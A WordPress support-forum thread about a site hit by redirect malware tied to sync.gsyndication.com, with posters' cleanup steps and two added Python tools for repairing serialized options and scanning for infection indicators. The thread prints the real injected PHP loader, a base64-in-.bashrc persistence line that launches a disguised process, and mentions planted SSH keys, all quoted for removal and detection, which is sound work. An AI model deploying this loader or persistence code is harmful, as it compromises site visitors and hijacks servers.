Malware Causing Redirect; No Satisfactory Response From Support
-
WordPress, you need to get it together. There is a vulnerability somewhere that is causing malicious code to be injected and is causing redirect to malicious sites. Apparently no virus scanner could find it, and it must be manually removed. But since this is WordPress.com and you’re hosting things, I do not have total control over the website and could not figure out how to empty the cache because the redirects kept happening. At least, I think that’s what was happening. Because after I contacted you, the redirects stopped. So I don’t know what you did and you won’t get back to me to tell me. You just said that you did a scan (that was clean) and removed the malicious code that I commented out. So I have no idea whether I should have you restore the site to a previous point, in case there are other malicious files that I missed. And you won’t diagnose the problem. Was it a vulnerable plugin? Does your site have a vulnerability? Something else? Will this exact thing happen again?
My friend who owns the site will be moving away from WordPress hosting because of this. But we want a clean site to move. Not an infected one. So I would appreciate if you would get back to me.
I will explain what was happening, for the benefit of others who might be experiencing something similar.
I noticed that when running a curl command on the website URL, it showed //sync.gsyndication.com/ just before <!DOCTYPE html> and I thought the placement very odd. I came across this post from December 11, 2024 explaining about some malicious code injected into wp-config.php. For reference, this is what the file looked like when I found it. See the bottom. So I commented it out and moved it before the closing php tags. But the redirection was still happening. I also noticed in the head tags (Developer Console in the browser):
https://mc.yandex.ru/metrika/tag.js
//sync.gsyndication.com/
I started doing database queries in phpMyAdmin, and with (my wp_options has some numbers in the prefix):
SELECT * FROM wp_options WHERE option_value LIKE '%<script%';
And what caught my eye was in the option_name wpw_auto_poster_wordpress_mapped_posttypes:
a:22:{s:4:"post";a:4:{i:0;s:8:"facebook";i:1;s:7:"twitter";i:2;s:8:"linkedin";i:3;s:90:"onetwo"></option></select></div>\https://aka.cloudsyndication.dev/";}s:4:"page";s:0:"";s:10:"attachment";s:0:"";s:14:"e-landing-page";s:0:"";s:17:"elementor_library";s:0:"";s:7:"product";s:0:"";s:12:"sfwd-courses";s:0:"";s:12:"sfwd-lessons";s:0:"";s:10:"sfwd-topic";s:0:"";s:9:"sfwd-quiz";s:0:"";s:7:"ld-exam";s:0:"";s:17:"sfwd-certificates";s:0:"";s:6:"groups";s:0:"";s:17:"sfwd-transactions";s:0:"";s:12:"guest-author";s:0:"";s:15:"magee_portfolio";s:0:"";s:13:"mailpoet_page";s:0:"";s:11:"sfwd-essays";s:0:"";s:15:"sfwd-assignment";s:0:"";s:19:"woowgallery-dynamic";s:0:"";s:11:"testimonial";s:0:"";s:9:"pdfviewer";s:0:"";}
Notice https://aka.cloudsyndication.dev/? That looks super sketchy. So I backed up the value and removed it with:
UPDATE wp_options SET option_value = REPLACE(option_value, 'https://aka.cloudsyndication.dev/', '') WHERE option_name = 'wpw_auto_poster_wordpress_mapped_posttypes';
But the redirects were still happening. And then at some point after contacting support, they stopped and curl no longer shows the malicious code before the document declaration, nor is the Russian Yandex script in the head. But as is, I have every single plugin turned off, and my poor friend would like to move on with her site. Everything is basically down and not properly functional.
Please, WordPress. Help us to move on from this. I would like a restore to a previous point before the injection of the malicious code. And some explanation as to what in the world happened. I might never get an explanation, but I at least want a clean site to move so that I can have better control over the site since WordPress is not providing satisfactory services.
The blog I need help with is: (visible only to logged in users)
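The post above removes the injected URL from a serialized wp_options value with a raw SQL REPLACE. The following is an added example, not code from the thread or from WordPress: it parses the PHP serialize() format that wp_options uses, locates entries carrying script tags or URLs, and re-serializes after removing them. The sample value is constructed to mirror the shape of the wpw_auto_poster_wordpress_mapped_posttypes entry shown above, with a placeholder domain (injected.example) standing in for the real one.

```python
"""Inspect and repair a PHP-serialized wp_options value (added example, not code from the thread)."""
import re

# Constructed sample modelled on the wpw_auto_poster_wordpress_mapped_posttypes value in the
# thread. The injected tag and its domain are placeholders, not the real indicator.
INJECTED = '<script src="https://injected.example/"></script>'
BAD_ENTRY = 'onetwo"></option></select></div>' + INJECTED
SAMPLE = ('a:2:{s:4:"post";a:4:{i:0;s:8:"facebook";i:1;s:7:"twitter";i:2;s:8:"linkedin";'
          'i:3;s:%d:"%s";}s:4:"page";s:0:"";}' % (len(BAD_ENTRY.encode()), BAD_ENTRY))

# Strings a social-posting plugin has no business storing in a post-type mapping.
INDICATORS = re.compile(r'<script|</option>|https?://', re.I)


def unserialize(text: str):
    """Parse the PHP serialize() subset WordPress options use: N, b, i, s and a (as dict)."""
    data = text.encode('utf-8')   # PHP string lengths are byte counts, so parse bytes
    pos = 0

    def parse():
        nonlocal pos
        t = chr(data[pos])
        if t == 'N':                           # N;
            pos += 2
            return None
        if t in 'ib':                          # i:123;  b:1;
            end = data.index(b';', pos)
            val = int(data[pos + 2:end])
            pos = end + 1
            return bool(val) if t == 'b' else val
        if t == 's':                           # s:LEN:"bytes";
            colon = data.index(b':', pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2
            if data[start + length:start + length + 2] != b'";':
                raise ValueError('length prefix does not match payload at %d' % pos)
            pos = start + length + 2
            return data[start:start + length].decode('utf-8')
        if t == 'a':                           # a:COUNT:{key;value;...}
            colon = data.index(b':', pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2
            out = {}
            for _ in range(count):
                key = parse()
                out[key] = parse()
            if data[pos:pos + 1] != b'}':
                raise ValueError('unterminated array at %d' % pos)
            pos += 1
            return out
        raise ValueError('unsupported type %r at %d' % (t, pos))

    result = parse()
    if pos != len(data):
        raise ValueError('trailing bytes after serialized value')
    return result


def serialize(value) -> str:
    """Inverse of unserialize(); every length prefix is recomputed from the actual bytes."""
    if value is None:
        return 'N;'
    if isinstance(value, bool):
        return 'b:%d;' % value
    if isinstance(value, int):
        return 'i:%d;' % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode('utf-8')), value)
    if isinstance(value, dict):
        body = ''.join(serialize(k) + serialize(v) for k, v in value.items())
        return 'a:%d:{%s}' % (len(value), body)
    raise TypeError('cannot serialize %r' % type(value))


def is_valid(text: str) -> bool:
    """True when the value parses; a stale length prefix (left by a raw REPLACE) fails here."""
    try:
        unserialize(text)
        return True
    except (ValueError, IndexError):
        return False


def find_injected(value, path=()):
    """Walk a decoded option and list (path, string) pairs matching INDICATORS."""
    hits = []
    if isinstance(value, str) and INDICATORS.search(value):
        hits.append((path, value))
    elif isinstance(value, dict):
        for k, v in value.items():
            hits.extend(find_injected(v, path + (k,)))
    return hits


def clean_serialized(text: str) -> str:
    """Drop injected entries and re-serialize so the stored value stays loadable by PHP."""
    def prune(node):
        if isinstance(node, dict):
            return {k: prune(v) for k, v in node.items()
                    if not (isinstance(v, str) and INDICATORS.search(v))}
        return node
    return serialize(prune(unserialize(text)))
```

The design point is the `s:LEN:` prefix: a SQL REPLACE that shortens a string inside a serialized value leaves the old length behind, PHP's unserialize() then rejects the whole option, and the plugin sees a broken value instead of a cleaned array. Decoding, pruning and re-serializing (as above, or with WordPress's own update_option() from a PHP snippet) avoids that.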
-
WordPress is removing the script tags in my post, and there is no way to for me to edit either.
-
I found the source of the malicious code. It was a plugin that no longer exists. I found it by downloading a previous backup after “Ultra SEO Processor” was installed by another administrator for this site. You can view the code here.
The plugin was the folder ultra-seo-processor and in that was a php file called ultra-seo-processor.php with the code I provided. And support finally got back to me and said that Jetpack does backups and restores. So I was able to download previous backups and inspect the code. I will be able to restore the site, thankfully.
-
About the sync.gsyndication.com malware.
More information on what to do:
You can find the virus code added to the wp-config.php file:
<?php ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } ?>
//sync.gsyndication.com/
And you can find a /home/Your Username/.bashrc and its content is similar to this:
# .bashrc
# DO NOT REMOVE THIS LINE. SEED PRNG.
#defunct-kernel { echo L2Jpbi9wa2lsbCAtMCAtVTEwMDcgZGVmdW5jdCAyPi9kZXYvbnVsbCB8fCAoVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS9Zb3VyIFVzZXJuYW1lLy5jb25maWcvaHRvcC9kZWZ1bmN0LmRhdCAtbGlxRCIgZXhlYyAtYSAnW2tzd2FwZDBdJyAnL2hvbWUvWW91ciBVc2VybmFtZS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwp|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# Uncomment the following line if you don't like systemctl's auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functions
The base64 code in the file above adds virus codes to the /home/Your Username/.config/htop/defunct.dat and /home/Your Username/.config/htop/defunct files.
If you decode it (i.e. with base64decode.org), you can read this:
/bin/pkill -0 -U1007 defunct 2>/dev/null || (TERM=xterm-256color GS_ARGS="-k /home/Your Username/.config/htop/defunct.dat -liqD" exec -a '[kswapd0]' '/home/Your Username/.config/htop/defunct' 2>/dev/null)
If you’re on a shared web space, you don’t need ssh access, so you don’t need bash access, so you don’t need this .bashrc file.
If you’re on a server to which you have bash access via ssh, then clean up this file…
Another point: the wp-config.php config file. Edit this file and search for something similar to this:
<?php ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } ?>
Hey yes, if you decode the base64 string PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+
You can see that you found the infamous sync.gsyndication.com!!
So if you find this piece of PHP, then enclose it in multi-line comment brackets /* */, like below. This will deactivate the malware and prevent a reinfection by this virus.
<?php /*ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); }*/ ?>
By the way, I advise you to search all your PHP files for the base64 sequence, as there are bound to be other infected files that need to be treated in the same way as wp-config.
Have a nice day!
-
More, the malware is also located in 3 themes: twentytwentyone, twentytwentytwo and twentytwentythree.
It also creates 2 .ssh folders which are hidden, one at the root of the site, the other in the parent folder. And in these folders it writes malicious ssh-rsa public keys in the authorized_keys file; in my case I found 4 keys.
For my part, I suspect the wp-fastest-cache plugin is part of the process, but I’m not entirely sure, I have to dig…
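The two posts above describe three places the infection was found: PHP files (wp-config.php and theme files) that print the decoded base64 script tag, a .bashrc that pipes a base64 blob into bash, and hidden .ssh/authorized_keys files under the web root. The following is an added example, not the posters' code or a WordPress tool: a read-only triage scan that walks a directory tree for those three indicators and decodes any base64 it finds so the reader can see what it would have executed. It builds its own fixture in a temporary directory; the fixture's .bashrc payload and SSH keys are constructed stand-ins, while the base64 marker is the one quoted in the thread.

```python
"""Triage scan for the indicators the thread describes (added example, not the posters' code)."""
import base64
import re
import tempfile
from pathlib import Path

# Base64 literal quoted in the thread; it decodes to the injected <script> tag.
MARKER = "PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+"
B64_DECODE_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
B64_PIPE = re.compile(r'echo\s+([A-Za-z0-9+/=]{40,})\s*\|\s*base64\s+-d\s*\|\s*(?:ba)?sh')
RC_FILES = {".bashrc", ".bash_profile", ".profile"}


def decode_b64(literal: str):
    """Decode a base64 literal, tolerating missing padding; None if it is not valid text."""
    try:
        padded = literal + "=" * (-len(literal) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_php(path: Path):
    """Flag PHP files that carry the known marker or decode a literal into a <script> tag."""
    text = path.read_text(errors="replace")
    findings = []
    if MARKER in text:
        findings.append(("known-marker", str(path), "sync.gsyndication.com loader"))
    for literal in B64_DECODE_CALL.findall(text):
        decoded = decode_b64(literal)
        if decoded and "<script" in decoded.lower():
            findings.append(("injected-script", str(path), decoded))
    return findings


def scan_rc(path: Path):
    """Flag shell rc files that pipe a base64 blob into a shell, and show what it decodes to."""
    findings = []
    for literal in B64_PIPE.findall(path.read_text(errors="replace")):
        findings.append(("b64-pipe-to-shell", str(path), decode_b64(literal) or "<undecodable>"))
    return findings


def scan_tree(root: Path):
    """Walk a web root (hidden entries included) and collect findings; nothing is modified."""
    findings = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        if p.suffix == ".php":
            findings.extend(scan_php(p))
        elif p.name in RC_FILES:
            findings.extend(scan_rc(p))
        elif p.name == "authorized_keys" and p.parent.name == ".ssh":
            keys = [line for line in p.read_text(errors="replace").splitlines() if line.strip()]
            findings.append(("ssh-authorized-keys", str(p), "%d key(s)" % len(keys)))
    return findings


def summarize(findings):
    """Distinct finding kinds, sorted, for a quick overview."""
    return sorted({kind for kind, _, _ in findings})


def build_fixture() -> Path:
    """Constructed fake web root in a temp dir, laid out like the compromise in the thread."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    loader = '<?php ini_set("display_errors",0); if (PHP_SAPI !== "cli") { print(base64_decode("%s")); } ?>\n'
    (root / "wp-config.php").write_text(loader % MARKER)
    theme = root / "wp-content" / "themes" / "twentytwentyone"
    theme.mkdir(parents=True)
    (theme / "functions.php").write_text(loader % MARKER)
    plugin = root / "wp-content" / "plugins" / "clean-plugin"
    plugin.mkdir(parents=True)
    (plugin / "clean.php").write_text("<?php echo 'ok'; ?>\n")  # benign control file
    # Constructed stand-in for the .bashrc persistence; the real blob is quoted in the thread.
    payload = base64.b64encode(
        b"/bin/pkill -0 defunct 2>/dev/null || exec -a '[kswapd0]' ~/.config/htop/defunct").decode()
    (root / ".bashrc").write_text(
        "# .bashrc\n#defunct-kernel { echo %s|base64 -d|bash;} 2>/dev/null\ndefunct-kernel\n" % payload)
    (root / ".ssh").mkdir()
    (root / ".ssh" / "authorized_keys").write_text(
        "ssh-rsa AAAA-CONSTRUCTED-KEY-1 attacker\nssh-rsa AAAA-CONSTRUCTED-KEY-2 attacker\n")
    return root


if __name__ == "__main__":
    for kind, where, detail in scan_tree(build_fixture()):
        print("[%s] %s: %s" % (kind, where, detail[:70]))
```

Pointing `scan_tree` at a real web root (and at the account's home directory, where .bashrc and the parent-folder .ssh live) gives a list to compare against a known-good backup before restoring; the scan reports and decodes but deliberately changes nothing, since the clean copy should come from the backup, not from editing infected files in place.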
- The topic ‘Malware Causing Redirect; No Satisfactory Response From Support’ is closed to new replies.